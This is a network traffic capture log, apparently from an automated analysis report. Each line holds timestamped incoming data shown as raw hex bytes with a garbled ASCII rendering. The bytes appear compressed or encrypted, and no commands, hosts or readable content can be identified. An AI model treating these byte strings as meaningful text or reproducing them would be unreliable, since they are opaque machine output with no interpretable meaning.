2023-09-26 07:46:56 UTC	6	IN	Data Raw: 4c f9 85 85 88 e0 8f 7f 79 2d ac c8 81 cb 6d f5 e1 de ed c2 8f d8 8f bf d5 76 ee 68 1c 3e a2 ec aa 6a a8 36 64 bd cd a5 b6 7d 3b bd d7 ef 15 02 e3 cd ab 07 54 da fe 47 f9 4b d9 ad df 10 6b 3b 36 7d de ad ff 99 f1 fd a8 2d eb e9 e7 aa 8c 03 8f 54 e9 7a 65 0f eb d1 bf af ce 81 c4 c8 99 06 7a 9a ae d3 dc dd b9 42 1a 4a f4 cb 27 73 e1 63 54 30 3f 8a 99 bb c7 96 ee bd eb bd a7 ce 0a 3c 0f 7e 5f 2c 7f f8 f3 6b 39 20 a1 09 e4 a6 4c f9 85 65 02 ba 29 53 7e 41 21 d9 cc 1b 2b 0f 1a 9e 0c e3 83 80 6e 6f db fa a1 3d fc 41 f5 96 da 07 de 11 77 e2 67 a1 c9 d7 30 3e 84 ba 1c 80 6c fb c6 fb 3e f2 28 c8 79 cb d4 dd ce 1b fb ea 7d b1 d4 5b 37 e8 cc 93 61 6b 37 89 d5 1f c7 70 2f 3f d8 35 ef 6d fc 6b 7b 0a e2 60 58 f1 a3 48 b9 73 f5 2a 58 df b7 86 2b 43 66 6d eb d4 63 e9 f8 Data Ascii: Ly-mvh>j6d};TGKk;6}-TzezBJ'scT0?<~_,k9 Le)S~A!+no=Awg0>l>(y}[7ak7p/?5mk{`XHs*X+Cfmc
2023-09-26 07:46:56 UTC	7	IN	Data Raw: 33 23 0e 9c a6 76 06 fc 9e 91 d5 5e 23 b1 b9 f6 3d a5 1f b7 13 f1 cd 13 c6 c9 60 22 bb e5 49 c0 fd 27 3b 85 9b 32 65 ca c3 32 01 dd 94 29 bf 21 d1 f1 a2 fc 4e e1 c8 d3 e5 a3 ec dc 19 79 d4 a6 ed 4d 75 76 bc c4 dd d3 8e d3 ed 2d 03 3b 3c 29 77 49 0f 13 01 f3 16 fd bc a4 2e 8c ec 93 9a 7e d0 a0 9c 81 5a a1 e6 bc 68 5c a0 b9 7f ef de d0 a8 8b 69 ff f8 6f 11 22 d3 b2 91 1b 7d 50 40 e2 0d 82 ac d2 6a dc fa 8f 8d e3 ba 5f ed 99 83 44 f8 1b 4c 95 c6 b7 4d 9d d7 6a 82 df f5 5b 76 ea a7 3e a2 02 ba 59 b0 ab 02 7a a4 88 0a 2d b0 c0 93 cf e2 de f5 03 dd 5f 33 d6 df 51 3e b2 ca a3 f5 9c 87 75 f4 3e 98 32 65 ca 6f 47 26 a0 9b 32 e5 27 95 b3 ce 27 ee 7b 81 f7 4f 78 47 71 d5 7c 42 6f e3 31 ae a5 30 49 07 db 9d b7 da d6 89 37 39 de 96 92 b1 e9 3b 7b 42 8d 43 6f 88 c2 a4 Data Ascii: 3#v^#=`"I';2e2)!NyMuv-;<)wI.~Zh\io"}P@j_DLMj[v>Yz-_3Q>u>2eoG&2''{OxGq\|Bo10I79;{BCo
2023-09-26 07:46:56 UTC	9	IN	Data Raw: 66 4d 1a 28 a3 0b 3b f7 a3 5b 3c 65 ca 14 2d 13 d0 4d 99 f2 83 64 57 cf a9 73 82 4f 83 4c d6 99 45 f9 30 60 ea 74 7c b8 47 da 3a 66 ea f6 df ee ba 3b 6f d9 e4 9c e0 51 b2 25 0e e2 83 1b 8e 9e 7f 8e a2 2a 49 7d 44 57 c0 1c 92 1e 24 15 54 ce e5 6a 39 46 67 4f 56 b9 3c 6f 67 76 aa c1 6d b9 c4 bb 7e 65 54 23 5e 19 77 d5 39 f9 a9 0d d5 36 e9 74 bb ee b8 d9 91 a3 e9 75 67 71 1f 29 63 d6 d2 76 68 68 46 76 27 e7 62 4c dc 9a e8 0f 94 61 1f 91 0a 15 6f 2a 39 3a 1f 18 2d 14 fe fc 41 d2 a1 29 cc 52 df a4 7f 98 f6 f7 e4 28 be f6 57 33 88 54 77 30 cc fd 86 13 d9 00 16 6f 95 4e 7c 39 dd f4 4e bb ce 55 7b c8 10 0e a6 7e 73 18 38 62 e6 d4 7d 9b 87 ca 7f bd f5 10 aa 43 a8 b3 ed 9c 32 65 ca c7 cb 04 74 53 a6 7c 02 d1 c7 fa a3 18 e1 5d f7 e0 9f e0 45 fa 19 6c e9 1a ac b5 e3 Data Ascii: fM(;[<e-MdWsOLE0`t\|G:f;oQ%I}DW$Tj9FgOV<ogvm~eT#^w96tugq)cvhhFv'bLao9:-A)R(W3Tw0oN\|9NU{~s8b}C2etS\|]El
2023-09-26 07:46:56 UTC	10	IN	Data Raw: 75 6e 4c 7b 44 cd 10 01 20 84 ec e8 4e b5 3f 6f 16 eb 16 d3 db fe d8 f6 f4 02 d9 ba ef 8d eb 84 9d b4 40 cc aa 8d 00 14 79 12 84 0c 58 6c 80 21 7b d9 1c ed e3 74 5e 03 ea d0 80 24 92 59 63 18 a2 c1 09 78 57 b5 72 74 4f 97 6b 6a ef 5c 97 e7 50 19 c5 d2 1e 4b 99 d4 f8 66 ee 79 e1 38 2c b8 03 9a 34 b8 89 bb 0c d9 59 e6 ee ac 1c e7 ee f3 b8 12 17 0c 3d c0 a1 41 c1 96 f2 d4 6e 4e d4 41 90 b7 d5 22 1b a9 5e e2 cb b5 5d e0 eb 7d 86 67 b7 77 ba 7c b6 39 6b 06 5a 58 3a dd 1d 04 e7 f9 87 89 4b b2 f3 d8 37 b6 7a 5d 15 e6 3a db b6 39 86 b0 c3 1d f3 6f 14 d5 d8 8f 0f 85 64 1e 6b 5b c4 26 15 b2 26 42 5d 97 fd 38 a0 56 7e 45 fd b3 56 7d 4a 29 db 06 2a 22 7e 04 e4 21 20 40 80 66 0e 9f 9d fa 47 cf b3 14 66 88 e0 a1 ad df 5e ac 40 f3 dd 69 5a 8c 05 0b 60 7d 5b 7f a6 4c 99 Data Ascii: unL{D N?o@yXl!{t^$YcxWrtOkj\PKfy8,4Y=AnNA"^]}gw\|9kZX:K7z]:9odk[&&B]8V~EV}J)*"~! @fGf^@iZ`}[L
2023-09-26 07:46:56 UTC	11	IN	Data Raw: 6e 7a bb 9c 32 e5 11 99 80 6e ca 94 b7 89 61 70 34 10 30 b6 20 3e 93 e7 1d 94 77 b7 33 e9 1f 6d e7 77 1c 96 e6 c4 59 ec ef 48 21 13 74 b6 29 76 a7 a6 0f ea a9 66 95 9d 2e a7 e1 fd 1e a7 4f 54 dd 8b 8e 58 b0 92 97 06 b8 c6 00 42 54 fb e6 33 aa 89 de ae d0 87 39 40 69 3b 31 a3 a6 87 01 09 3d 6e 2a ed 24 44 52 0c 60 25 4c ea 28 d5 4c dc d6 11 d4 41 5b 7e 33 32 e8 12 4a 3f 8f 00 5d bb a1 1e 03 b7 1d 20 36 64 e2 ce cb 39 40 97 47 7c bf 24 af 71 eb 93 9f 01 68 3d b5 4b 1c a4 af 69 86 9c ff 1e e0 52 84 92 9d fe fa 67 e3 06 c8 1c 83 48 ba a6 1e ad a2 59 af 7b e6 ce 85 d1 eb ad 5f 36 bf 8a 68 c7 cb 84 d5 c1 44 53 d6 78 9d ec 86 3f 30 17 08 00 02 f2 99 8d 1c 30 69 55 03 cf 80 aa ba d1 fe b4 f5 a8 41 55 49 d7 bf 43 89 cd d7 cb f1 ee 72 9a 6a de 2d e4 e4 db c2 bf b7 Data Ascii: nz2nap40 >w3mwYH!t)vf.OTXBT39@i;1=n*$DR`%L(LA[~32J?] 6d9@G\|$qh=KiRgHY{_6hDSx?00iUAUICrj-
2023-09-26 07:46:56 UTC	13	IN	Data Raw: 7b b9 b4 3f 9f b6 9f e7 da 3d 65 ca af 2c 13 d0 4d 99 f2 80 8c 76 5b 67 f2 ec 9e 44 d2 f8 65 7a ba 9e 13 ba 4d 44 00 a9 13 11 7c b7 ee b2 1d ac 3b d3 07 1b 2a 1e 2a 5b 3d 31 3e 6a 77 0c dd 1e 63 d6 eb f3 a8 61 06 f0 78 90 47 6d b9 3d 86 69 a0 12 b9 cb c8 f5 ae f7 d8 ba fc 47 63 e9 d6 9d b9 03 60 0d 5b c6 60 f2 88 a1 93 22 b0 69 83 4d 3f 20 15 10 77 a7 b2 df b9 1f 4d 96 d1 78 dc 57 ca 5b a4 2d 9b 09 62 43 94 e0 4e da 1d a9 3f 36 87 d0 bd 9f 08 0f a8 95 b7 10 9b 6f b0 c5 b5 38 08 9b a5 aa d9 63 f3 3d 26 aa f4 51 8b 0a c4 ad d9 af 26 66 5c f1 a8 69 db e7 eb 05 a3 ff 4d 3b 7f 87 1a 9a 47 da 0e 4e 95 7c 8f b1 13 8a 54 91 6f 2a b1 7c cc a9 90 94 5a a4 d6 1c c8 89 55 6b d0 b4 61 57 fa 9d 74 c1 03 77 ca d1 d8 93 fb 1e 00 bb 63 e3 f3 7d 97 f7 cc 3d e5 bd ad 39 53 Data Ascii: {?=e,Mv[gDezMD\|;*[=1>jwcaxGm=iGc`[`"iM? wMxW[-bCN?6o8c=&Q&f\iM;GN\|To\|ZUkaWtwc}=9S
2023-09-26 07:46:56 UTC	14	IN	Data Raw: af 1b 7b 06 6c cb ee d4 58 cb ec 00 03 2c 27 e4 7c 04 3f 6a b6 67 0a bb 60 ab 8d 23 b7 3b 5e 7b 00 b0 0b da d0 5d 43 d9 da 99 b2 d8 c9 9f f2 f1 58 ff 61 af 6e 4b 89 4a dd 68 ce f6 35 fb 97 af b8 93 f5 62 75 58 fe 11 b6 aa a5 cc 88 9a 71 16 d6 32 8f 6e 03 e8 54 16 1c e5 ad 17 10 42 40 5c 31 84 05 01 97 80 b0 20 c0 82 88 0b 22 2c 88 b0 00 22 5f 0b f9 2f 04 00 0c 50 d2 66 a0 87 a1 94 1b f2 fd fc b9 0c 0a 8f 65 80 16 f4 f1 10 37 cf cb 4e 21 06 3e d6 8e 0c d4 84 25 80 04 15 a8 11 81 7c 4f f5 33 50 02 c2 44 00 11 08 22 00 c5 1c ca 11 12 11 45 02 4c 40 14 89 a0 fc a3 48 00 31 11 e5 cf 29 c5 94 68 2b 75 99 f6 d9 07 55 1e b1 74 aa fe 14 51 3f be 26 9f 99 35 0c da f4 19 49 55 f7 e4 89 2b e6 ab 8e ef f5 c0 8a 88 0c 65 25 10 5b 7e f4 68 30 49 02 c8 9a 8b 16 64 30 05 Data Ascii: {lX,'\|?jg`#;^{]CXanKJh5buXq2nTB@\1 ","_/Pfe7N!>%\|O3PD"EL@H1)h+uUtQ?&5IU+e%[~h0Id0
2023-09-26 07:46:56 UTC	15	IN	Data Raw: d1 b2 2d 0c ee a0 aa 6f 6e 44 74 2b ea 9c cc ee 31 03 98 14 f3 97 59 3d 61 f6 aa 3a 24 2f 37 98 3d 78 30 0c 33 e4 8f 23 ae 08 99 dd f3 e8 44 ff f5 f7 95 97 4b c7 fc 51 f9 8d 55 b6 4c 1d 64 f1 f3 d4 cb a2 2f cf 3d d7 96 31 04 99 0c 7e 79 ae e1 e7 2a 29 46 aa 20 1d 4d 9c 5c be 8a 3b eb ef 91 fb 54 3b 81 58 55 2b ed 91 a0 a3 cc 88 b3 91 5e 2a 15 d2 24 4d 6d 56 a7 52 86 8c 33 0f 88 0a 92 05 ec ff 02 bc 9b 95 3b 45 23 f1 47 59 ba 7b de 93 ff f2 f7 d3 76 6e ca 94 33 32 01 dd 94 29 e7 84 55 92 ba 6f c2 56 ad 85 77 24 fd 57 96 8e d7 d3 55 0d 73 b0 6e e4 55 72 c8 18 02 64 ce 4c 11 5a 65 37 ac ce eb 3b da 43 58 77 3f c8 1b 07 ce cc d7 3b bd ea 01 2b e3 15 c1 7e 00 bd 1b 43 55 6b 2d 43 6f 84 ac 6a e0 10 d0 75 98 2b 0b 70 f6 d2 41 dd bc 1f 01 3a 6c ee e7 ff 91 bb 26 Data Ascii: -onDt+1Y=a:$/7=x03#DKQULd/=1~y)F M\;T;XU+^$MmVR3;E#GY{vn32)UoVw$WUsnUrdLZe7;CXw?;+~CUk-Coju+pA:l&
2023-09-26 07:46:56 UTC	17	IN	Data Raw: 66 87 65 db 03 73 4d 1a 84 6a 4a a2 5d fe 63 27 4f 70 3d f3 60 4e 7b 8d 14 b0 86 ee 7b a7 2d 9a cd 63 78 07 46 5b cf b0 81 e8 ea f0 e3 e0 fb 17 b2 71 56 65 d9 d8 26 ab 7c ae cc db 33 66 f5 c9 b5 00 b7 4b 61 6c 0a f3 06 17 2a ec 40 66 67 e8 96 88 6d ae 68 23 a2 5b 2a aa 78 29 d1 96 37 f2 b4 c5 94 b6 94 52 e2 c7 d9 7d ce 76 27 da 4c 4b 93 b1 2d 83 06 e5 35 a2 0e 1b 68 58 da 0f 90 ce 3c 2f 9b 7d 21 68 40 ff 4f a9 2d db 1f 2f 32 36 86 d4 8e 63 9d 51 4e 25 bb 7a 1e 0a 21 84 35 33 7b 97 0c ec 95 33 9b 80 97 0c ee 71 0d 48 97 32 6d 17 40 58 80 4a d8 07 80 0b 22 6e 04 f0 05 10 6f 01 68 a3 b0 6c 2b d1 35 51 78 2d 4c 1e ab d7 c6 6a 87 97 d9 d9 62 d7 98 1d d8 e4 f6 99 50 27 49 c6 a5 02 2e ed 35 32 df 97 01 aa 48 a4 30 60 9e bd 2b bc 9d b2 a7 c3 7a 4d 83 c3 3c b2 02 Data Ascii: fesMjJ]c'Op=`N{{-cxF[qVe&\|3fKal@fgmh#[x)7R}v'LK-5hX</}!h@O-/26cQN%z!53{3qH2m@XJ"nohl+5Qx-LjbP'I.52H0`+zM<
2023-09-26 07:46:56 UTC	18	IN	Data Raw: 54 34 b9 5b 48 0c 04 5b 35 47 5e a0 b0 46 7f 64 10 68 3d 6c e6 38 77 00 0c e0 40 d9 f2 b1 18 e5 f4 f6 70 8b 9a e5 31 6b 2e 78 3a cc 17 46 de 2b 66 61 f8 84 2c d4 d4 62 25 f4 c8 06 c0 e3 22 54 60 bd 3a 70 a2 41 91 89 46 2a 6c 29 2f 3a 75 20 ef 9a d1 8a 20 2d c8 1c d5 82 ad da 7b aa a0 4a 43 9e 6f c3 88 a1 9e 32 65 ca 40 26 43 37 65 8a 93 7f fb 53 f6 66 c9 e7 e1 c1 aa 00 ed 8a 66 e8 dc fe f9 dc 6f cd b9 08 ac c1 9b ea cb 54 90 8b b0 75 6d f9 cd 31 76 71 4e a2 81 61 f1 71 81 3e 3d 17 46 45 45 89 ab f6 80 80 24 d0 11 ea 3d 3a 09 30 03 40 01 74 a4 ef db aa 84 a1 13 f0 63 41 53 07 ac d5 7b 68 ca f1 4e e0 7a cc 5d 87 a9 43 05 ee 4c 3e 99 0a 02 34 5d 9d 55 45 11 8b 86 52 f1 42 09 c5 39 45 66 e3 02 16 0f 86 01 9f 02 c2 13 02 3e 21 c2 13 64 5b 26 56 77 0b 05 10 47 Data Ascii: T4[H[5G^Fdh=l8w@p1k.x:F+fa,b%"T`:pAF*l)/:u -{JCo2e@&C7eSffoTum1vqNaq>=FEE$=:0@tcAS{hNz]CL>4]UERB9Ef>!d[&VwG
2023-09-26 07:46:56 UTC	19	IN	Data Raw: 41 fc 8a 05 c4 21 c0 05 80 96 72 da 7d cb 76 6f f0 92 28 6d 89 d5 27 f3 e7 28 b6 6e 90 28 51 4a d9 ec 2d db be 55 dc f6 00 a0 03 b5 c9 3a 07 e8 3a 13 c8 7c 18 57 56 dd 4d f8 eb b0 9b af a1 02 74 89 3c 71 b0 aa d0 fd 10 c1 b3 0c 1a f7 f5 38 b5 fd e9 52 e7 fa 28 7d 7b ed 7b 82 dc 5a 67 82 44 10 29 a6 94 28 62 d8 30 e0 37 09 b3 81 21 64 6f 9a 6b 66 f1 f0 29 60 58 4b 6c c4 df 61 80 4b f9 19 45 00 b8 25 a2 17 4a f4 12 89 5e 52 4a 2f 5b 84 97 98 e8 46 85 9d 56 23 e4 81 1d 40 66 ca 0c 3b a7 a2 bb 15 10 a7 ee eb 99 34 8c 85 67 e3 dc 71 9f 89 b2 ca 22 e3 2a be ae 18 2e fe 91 14 e2 cd a8 82 a2 8a 67 67 3a 03 35 40 42 d5 77 c0 0a be 4a c1 a5 bd 7c 9d 0b 36 cf 5e 69 68 b8 25 97 35 2e c8 06 be 04 70 2d 91 96 39 35 50 ab 66 e9 8d 92 6b 36 ed 40 f4 ae f9 f4 e8 2f 7b 32 Data Ascii: A!r}vo(m'(n(QJ-U::\|WVMt<q8R(}{{ZgD)(b07!dokf)`XKlaKE%J^RJ/[FV#@f;4gq"*.gg:5@BwJ\|6^ih%5.p-95Pfk6@/{2
2023-09-26 07:46:56 UTC	21	IN	Data Raw: 12 c5 94 3d 66 46 02 88 5a 8d d2 79 b0 84 de 67 f5 f3 e2 f3 15 93 86 e4 40 45 95 29 ec a0 75 40 5c f5 e1 4d bd 7c 78 a2 bc 61 ea b6 f8 99 ad 99 46 50 f9 40 5f 03 34 9e 32 c1 8d bb aa 83 d4 0c 2b 8b a7 9e 75 fa 14 42 39 8c 31 b7 b0 2e a2 e2 5d 6a 18 c4 4e 06 2a a6 fa ee c9 0b eb e2 02 a5 b7 ef d5 5d e4 db 7b af f6 24 bf 20 72 89 ff f4 fb 19 b7 6e ca af 25 93 a1 9b f2 ab 4a c1 03 fb 2f 0a 52 af b9 a2 cf d4 24 29 e9 ce ef 27 cb 09 66 f5 71 5f de 9a 65 6b 67 19 33 73 02 5a d8 31 cb 9e 99 b6 6a 8d af fa 22 b4 f6 6d b5 1c c9 47 35 bd 54 66 ae 59 36 4f 5d 43 06 67 75 3f 83 0c f4 2c 53 c7 2c 1a 1f 3c cb 2e dc 68 9f 0a db 66 bc 55 56 ef 92 86 b1 6b 6d e9 b8 05 96 b1 53 75 33 88 2b 4f 1d 09 72 88 81 80 b8 ae 4b 78 5e 02 7e 59 02 7e 0d 01 bf 66 75 4a bc 40 8e 0b 47 Data Ascii: =fFZyg@E)u@\M\|xaFP@_42+uB91.]jN*]{$ rn%J/R$)'fq_ekg3sZ1j"mG5TfY6O]Cgu?,S,<.hfUVkmSu3+OrKx^~Y~fuJ@G
2023-09-26 07:46:56 UTC	22	IN	Data Raw: 55 45 b2 eb ec e9 34 d9 e7 81 ab 51 ac 99 32 e5 97 90 c9 d0 4d f9 cd ca bf ff 59 bc 58 2a 9a c7 9c 5f 02 58 76 eb 48 fa e6 21 15 8c 48 99 9e a1 4b c5 4e bf 22 11 62 7a 6a 70 fe 2e 2f b8 72 da 89 5a ad 85 ef 5b 40 47 a5 e4 56 1a c0 c6 ac 22 d6 bc 4e 05 cd bc 8a 3d eb 06 60 e3 c7 19 db 38 de 0c 2a b6 4c e7 b5 87 bc 88 c5 49 09 29 62 22 9f 3f ab 7d 41 25 35 5d 1b 38 04 81 29 1f a4 fe 1c 04 19 71 cd 5e 2a 21 3b 61 08 f8 b4 20 3e 63 c8 1e 2a 11 60 25 80 05 08 52 a2 74 a3 44 99 89 cb 2c dc eb 16 d3 35 a5 14 d9 2b a5 b0 a4 16 c8 d5 29 a4 c0 b6 9e 64 a4 ee a8 39 62 00 17 68 54 26 60 cb 6f fa 1a d5 48 5d de 40 c5 72 84 2f c9 83 3c 3d f7 5c 15 50 77 7f 44 be 7f 0d d2 f2 65 d6 ca fa 29 ef dd 78 35 67 1e 23 90 a1 5c ba 8f ee 37 87 19 0f 08 36 1f 51 0c 41 db d6 80 66 Data Ascii: UE4Q2MYX_XvH!HKN"bzjp./rZ[@GV"N=`8LI)b"?}A%5]8)q^!;a >c`%RtD,5+)d9bhT&`oH]@r/<=\PwDe)x5g#\76QAf
2023-09-26 07:46:56 UTC	23	IN	Data Raw: ee 28 0d 90 54 9b d1 ca b8 41 06 98 c2 10 e6 b1 c7 10 70 59 02 5e 96 80 5f 96 25 7c cd b6 71 f8 35 83 38 5a 32 15 47 b7 44 f4 ad d8 c2 5d 63 4c 57 0e ee 9d 28 ab 53 16 7b 38 d9 9c 9d 01 74 32 fe 16 d0 a9 cd 98 03 74 38 0e e4 4d 0e ac 89 97 49 ab 6e a9 f3 6b 6a ce 4e 58 05 38 c9 df f0 9e 55 f6 63 13 a8 d9 68 db 6b d3 3a 38 da 16 d4 7c e8 26 1b 25 f8 8d 1e ae 37 cc 58 37 49 89 b7 36 64 4a 94 89 1d 71 5c 36 4e 58 7f e3 8a 1e 2a ec 61 66 fe 88 c9 f2 ca 1b 7a 78 59 58 71 d0 36 7a 8e c1 53 fd 68 f3 03 2f b9 b9 88 31 5b 5a 7e d8 67 d9 d4 98 62 4c b7 94 b6 18 6f 01 c3 5f 4b 50 f3 35 7b cb 0c 4f c5 d9 d1 65 41 fc db 65 c5 bf bd ac 21 26 82 6b 4a f4 ad c4 b6 fb 16 13 bc c6 44 37 92 53 37 02 c0 ec 81 aa aa 3e 7a 9b 36 62 82 13 25 8f 1a eb ea 31 53 9e 57 f9 1d 19 30 Data Ascii: (TApY^_%\|q58Z2GD]cLW(S{8t2t8MInkjNX8Uchk:8\|&%7X7I6dJq\6NX*afzxYXq6zSh/1[Z~gbLo_KP5{OeAe!&kJD7S7>z6b%1SW0
2023-09-26 07:46:56 UTC	25	IN	Data Raw: 64 91 dd a3 39 00 6b 47 63 04 04 6d d9 e6 4f 49 ae b3 34 07 25 16 6b ee 94 79 d7 9d fb 04 cf 5e 45 bf 23 b4 9b 5c 37 83 8a 7d 52 93 7c d4 8a 23 db 3a c7 bc 81 fd fd 23 36 6d eb 1f 61 29 ca 5c 27 41 93 4f 19 cc a9 e4 a0 2e e9 f4 c6 04 56 25 63 ea 50 7f d7 ed b3 ac 9d 29 9e d7 15 d4 2d b7 ed 30 c5 80 4e 58 62 a8 65 70 b5 2c 61 b9 ac eb 97 75 0d 5f d6 65 f9 b2 14 db 5a 44 0c 80 c0 f1 eb ae 39 68 79 fa 56 62 db 6d 44 b4 65 9b 3b 15 db 4e 3b 49 a1 fa 08 b4 cd 9d fe 59 f3 77 b9 a7 6c f3 9c 7f 12 6b 26 ad 55 c0 0d a8 ac b4 a9 59 c3 40 c0 27 48 1b b4 57 cc 06 88 d5 97 0e 6b 81 ba 77 25 d7 c3 b3 c3 d8 d3 a9 e7 ca bd 35 85 bb 19 a7 ed e8 e4 5c 12 b3 9d de de 76 14 71 5c 5e 4f fc 7b 77 67 3f 40 be fc e9 05 73 ca cf 2a 93 a1 9b f2 b3 cb ee a1 c4 50 e7 1e 6d 46 65 82 Data Ascii: d9kGcmOI4%ky^E#\7}R\|#:#6ma)\'AO.V%cP)-0NXbep,au_eZD9hyVbmDe;N;IYwlk&UY@'HWkw%5\vq\^O{wg?@s*PmFe
2023-09-26 07:46:56 UTC	26	IN	Data Raw: 31 dd 42 08 ff 15 10 97 65 09 97 75 09 5f 42 b1 b5 5b 10 ff db b2 e0 df d2 02 1b 11 7d 8b 89 5e 62 4c 7f 8d 48 af 5b 84 2b 41 65 a8 f2 ef 37 9b 2b 92 41 27 fc b3 c8 c6 71 95 b1 ab ab 06 32 4e 62 86 6f 30 cf 7d 1c bb 12 70 d0 79 ce c5 e6 00 45 1f 9e 74 ae 37 4f 8e e4 47 c9 2f 12 a3 75 82 3b 2f 48 d0 3f 1b 54 cb 94 7e 05 a9 03 27 d4 2f 02 8d db f5 0b d3 1f 08 a1 ab a7 79 be 25 17 75 99 3a cd 44 eb 53 ca 49 cf 4d f9 99 65 1e 4a 4c f9 69 e4 8f 7f 79 ed 5d e6 0d 11 00 a8 23 fe ce eb a6 d2 42 3b e2 cb d1 e7 c5 2e f6 13 03 a5 ca 98 11 e5 60 46 6a 7f 6a 4e 37 75 7b bb 75 1a 95 40 71 60 42 85 ba 50 94 92 7e 07 95 34 a4 df 92 58 71 46 75 8f 5d bf 7b 66 ae 01 74 e8 ee 5b c6 cd a8 52 42 3e 91 ae a8 0d d5 3b b8 68 d4 d4 8e 07 28 b1 e3 a0 ba ee 86 90 6d e3 70 09 01 d7 Data Ascii: 1Beu_B[}^bLH[+Ae7+A'q2Nbo0}pyEt7OG/u;/H?T~'/y%u:DSIMeJLiy]#B;.`FjjN7u{u@q`BP~4XqFu]{ft[RB>;h(mp
2023-09-26 07:46:56 UTC	27	IN	Data Raw: c6 57 5a b9 4d f5 a3 84 80 35 2c 82 25 a6 b5 73 19 52 f3 53 17 5f ee 05 18 cf 6e 3f 9d aa 5e 64 b5 87 e4 01 2b 68 4d 1d 48 22 50 79 86 a5 b1 c6 b6 ee ce 77 f4 3d f2 68 d9 75 8c 1e ac f3 df ff fc 62 7e 3a ff f2 f7 d3 0b e6 94 cf 29 13 d0 4d f9 ec a2 36 73 04 de 0e be 49 2c 07 c4 8f 55 a6 ca b5 5b 38 5f a7 ec 65 d5 7b b4 ee 7c 1a a2 c4 a9 55 89 62 1d ef dd ea a6 9e f5 5e d0 83 3a d0 9b 18 6a 4a d6 44 24 47 95 52 87 9f a8 d3 79 83 37 05 d8 d0 00 3d 71 45 2e f7 a1 82 48 42 04 0c 28 27 c8 f2 af ec 0f 18 54 12 10 2c 88 eb 65 5d 32 1b 17 f0 77 01 f1 19 10 2e 05 9e c4 ec 49 2e 5e 63 66 e3 6e 31 51 61 e3 28 a5 6c 1e 57 a6 41 1e 38 8f a8 a0 de 35 dc 97 c6 66 26 bd 06 74 a4 50 9f 98 c7 59 b8 e8 99 bc ee c5 6a 04 37 76 ef ef 01 a1 e2 0e 25 89 99 69 44 94 48 65 f1 8c Data Ascii: WZM5,%sRS_n?^d+hMH"Pyw=hub~:)M6sI,U[8_e{\|Ub^:jJD$GRy7=qE.HB('T,e]2w.I.^cfn1Qa(lWA85f&tPYj7v%iDHe
2023-09-26 07:46:56 UTC	29	IN	Data Raw: 33 74 60 d4 16 fb 8c 9c 02 55 92 de a5 e1 7f d8 e6 cb 9f d1 96 c3 9f 9b eb 1d 1b 3a 10 30 17 f2 d6 8a 20 00 86 10 b4 8d 5c 78 5e 16 fc ba 30 23 27 f1 e3 b6 98 d2 cb b6 c5 12 3f 2e dd 12 55 51 20 97 d0 bc 50 5d a8 38 05 b8 2c 9d 66 09 39 f5 0c 8c 1a 25 b9 04 0d d6 33 e5 ab 9a e5 2a 99 46 75 b6 30 b5 d5 00 be 46 0f 7e b4 ba 27 e8 fa ed 4c d9 47 74 fd 1f 87 05 a8 ee 56 1f d4 f9 24 da 0d f8 09 19 52 7d e3 1c 27 d2 1e 32 65 ef bc b7 ba 07 60 9e dd 44 4a 5a b5 81 1e 90 96 20 db 5e 35 73 50 17 e5 41 08 3a d5 47 de 8c f7 98 38 a9 ba a2 00 28 4f 58 56 3c 8f 71 f4 b8 f8 3e 97 06 89 4b 7b aa 85 0c 18 3c 61 ec 2a 3b c6 71 ef e4 76 06 78 40 1a 0d 73 b0 73 52 8e 36 05 7b 54 e6 d3 f1 57 f5 ab 01 31 e2 d6 35 a3 22 0e 38 c0 1a a0 bc ec 93 e2 bc 88 28 11 61 8a 31 01 16 63 Data Ascii: 3t`U:0 \x^0#'?.UQ P]8,f9%3Fu0F~'LGtV$R}'2e`DJZ ^5sPA:G8(OXV<q>K{<a;qvx@ssR6{TW15"8(a1c
2023-09-26 07:46:56 UTC	30	IN	Data Raw: 6f 2b bc 54 d1 99 c6 63 8a 40 23 02 b2 00 4b 01 3b 65 d3 a8 c1 54 03 e8 74 73 9b 72 8d bd 9a a5 dc 3c 70 d3 1d 6d 88 37 a8 f6 97 00 40 40 7b 3f 06 3b 75 db c9 29 a9 cc c1 bd e3 40 bb 05 9e be d9 57 e9 7c e0 8c dc 1f 87 fc 18 19 01 ba 03 c6 69 57 44 3d d0 b3 af 6f 6a 17 97 0e 25 5c 88 59 a2 0e da 7b 88 db 6b 8c 12 34 93 dd 14 30 38 16 00 eb 4d d3 72 38 a5 54 53 90 52 1b f4 93 da 31 48 a5 bc 84 85 1c 42 61 9f 90 d5 3e f3 12 c6 a0 b9 04 bf 03 50 de f9 89 6a f0 04 3d 16 1e 1e 39 9a 4a e0 61 67 f0 10 00 20 51 a2 0d 20 26 4a df 96 2d 5e 97 10 fe f7 b2 86 a7 75 59 be 2c 4b 78 2a 8c dd f3 1a e0 6f 34 63 77 dd e2 4b 8c 54 bc 5f 52 55 d4 10 85 8a 5c 07 af 89 58 f1 47 8e 67 57 d0 16 3b 2d 21 95 3e 31 d3 68 89 3c 19 d7 9c d5 c5 af 53 e8 4e 0d 90 39 23 70 87 2c 92 14 Data Ascii: o+Tc@#K;eTtsr<pm7@@{?;u)@W\|iWD=oj%\Y{k408Mr8TSR1HBa>Pj=9Jag Q &J-^uY,Kx*o4cwKT_RU\XGgW;-!>1h<SN9#p,
2023-09-26 07:46:56 UTC	31	IN	Data Raw: e2 11 de 99 15 f1 6c e3 25 fd 81 0e 1b f5 43 d3 d9 a9 81 85 1e eb 94 67 a3 66 30 07 56 97 dc b6 b9 bc 35 d7 8c 90 66 ee d4 d8 fb 2e 94 54 89 0b 20 09 85 c0 04 56 e5 a2 94 c5 1e 19 6d c4 06 b7 94 6f 4c 25 95 e0 75 7c Data Ascii: l%Cgf0V5f.T VmoL%u\|
2023-09-26 07:46:56 UTC	31	IN	Data Raw: 96 97 55 36 d9 5e 8d 71 61 69 53 21 07 09 62 22 4a 89 6e 5b cc 46 cc eb 9a d6 a7 cb 9a 2e 44 69 59 c2 33 06 5c 11 71 0d 80 b8 2e 01 11 71 0d 88 4b 0c 74 4d 44 31 11 6c 94 28 11 98 38 76 ec 55 34 35 ad f6 ac 96 8c 1b 02 07 2a d7 44 33 27 c7 e1 ef aa 29 d1 82 30 f5 9e cb cf 54 80 a3 2b a8 99 f6 0a e7 77 e9 c0 51 6b 50 f2 69 08 f8 de fb 86 1f 48 fc 4d 99 72 5a 26 a0 9b f2 bd c5 ac 8d 87 4e 50 4e 06 0a f5 e5 0c ed f2 e5 c4 51 67 56 3b 08 a6 56 2c 17 c1 49 94 03 0e 7b 92 6e b5 4a 8c fe 8b ee b7 52 6b f1 9b 24 74 c5 59 30 27 1d d2 5e 28 b9 